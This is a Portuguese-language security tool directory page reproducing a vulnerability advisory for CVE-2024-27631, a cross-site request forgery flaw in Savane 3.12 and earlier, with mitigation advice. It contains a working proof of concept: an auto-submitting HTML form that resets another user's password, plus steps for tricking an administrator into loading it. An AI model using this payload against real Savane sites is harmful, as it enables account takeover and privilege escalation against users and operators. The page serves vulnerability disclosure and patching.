Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27631 — CVE-2024–27631 Referência | Kitploit
Ferramentas/GitHubGitHub/ally-petitt/cve-2024-27631
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubally-petitt/cve-2024-27631

CVE-2024-27631

CVE-2024–27631 Referência

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Detalhes da Vulnerabilidade CVE-2024-27631

Visão Geral

No Savane v3.12 e anteriores, a falta de proteção contra CSRF em funções administrativas pode permitir escalonamento de privilégios e/ou assunção de conta. Em particular, o endpoint /siteadmin/usergroup.php inclui a funcionalidade de alterar as senhas e as flags administrativas de outros usuários, permitindo efetivamente que um atacante se torne administrador.

Outros endpoints notáveis vulneráveis a CSRF incluem:

  • /support/admin/userperms.php - Altera as permissões de quem pode publicar em um tracker.
  • /project/admin/conf-copy.php - Sobrescreve a configuração existente de um grupo com uma cópia de outro grupo.
  • /project/admin/editgroupnotifications.php - Edita as notificações de grupo. Itens privados podem ser enviados para listas de discussão públicas.
  • /project/admin/useradmin.php - Remove usuários de um grupo.
  • /news/admin/index.php - Edita o endereço de e-mail do tracker de notícias.
  • /people/editjob.php - Adiciona um trabalho para um grupo.

Classificação CWE: CWE-352: Cross-Site Request Forgery (CSRF)

Relatado por: Ally Petitt

Produto Afetado: Savane

Versões Afetadas: 3.12 e anteriores

Etapas de Validação

Esta é uma Prova de Conceito (PoC) para alterar a senha da conta de outro usuário como um caminho para a assunção de conta.

  1. Selecione um usuário vítima cuja senha será alterada.
  2. Anote o userID da vítima a partir da página de perfil (/users/<username>).
  3. Crie a seguinte página web maliciosa, substituindo user_id pelo ID do usuário vítima e <savane_instance> pelo nome de domínio/endereço do host adequado.
root@kitploit:~
<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">

    <input name="form_pw" type="hidden" value="Password1!" />
    <input name="form_pw2" type="hidden" value="Password1!" />
    <input name="user_id" type="hidden" value="<user_id>" />
    <input name="update" type="hidden" value="Update" />
    <input type="submit" value="Submit Request" />
</form>

<script>
document.getElementById("autosubmit").submit();
</script>

  1. Hospede a página HTML maliciosa em um servidor web e envie o link para um administrador (o administrador deve estar no modo superusuário para que isso funcione).
  2. Depois que o administrador clicar no link, faça login na conta da vítima com a senha muito segura Password1!.

Observe que este script de PoC foi testado no Firefox v103.0 (64-bit).

Mitigação

Atualize para o Savane versão 3.13 ou superior. O patch pode ser encontrado aqui.

Baixar ferramenta